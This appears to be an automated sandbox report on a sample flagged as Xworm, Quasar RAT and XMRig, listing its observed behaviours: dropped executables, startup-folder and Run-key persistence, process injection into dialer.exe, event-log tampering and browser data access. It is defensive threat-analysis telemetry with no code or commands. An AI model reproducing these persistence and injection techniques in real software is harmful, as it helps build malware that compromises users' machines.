Analysis Overview
SHA256
fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75
Threat Level: Known bad
The file primate protocol.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Xworm family
Xmrig family
Quasar payload
Detect Xworm Payload
Quasar RAT
Quasar family
XMRig Miner payload
Creates new service(s)
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Indicator Removal: Clear Windows Event Logs
Drops startup file
Checks computer location settings
Reads user/profile data of web browsers
Checks BIOS information in registry
Obfuscated Files or Information: Command Obfuscation
Adds Run key to start application
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
Drops file in System32 directory
UPX packed file
Drops file in Windows directory
Launches sc.exe
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Browser Information Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
Checks SCSI registry key(s)
Suspicious use of UnmapMainImage
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Checks processor information in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-05-03 16:16
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-03 16:15
Reported
2025-05-03 16:18
Platform
win10v2004-20250502-en
Max time kernel
133s
Max time network
149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4480 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 5052 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xmrig family
Xworm
Xworm family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\CompPkg.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\systemprocess.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
| N/A | N/A | C:\Windows\host.exe | N/A |
| N/A | N/A | C:\Windows\CompPkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | C:\Windows\System32\svchost.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" | C:\Windows\CompPkg.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img" | C:\Windows\CompPkg.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5948 set thread context of 704 | N/A | C:\Windows\host.exe | C:\Windows\system32\dialer.exe |
| PID 1632 set thread context of 4492 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 1632 set thread context of 6036 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 1632 set thread context of 4832 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 4480 set thread context of 3148 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 5052 set thread context of 4500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\systemprocess.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| File created | C:\Windows\host.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| File created | C:\Windows\CompPkg.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133907626609832177" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
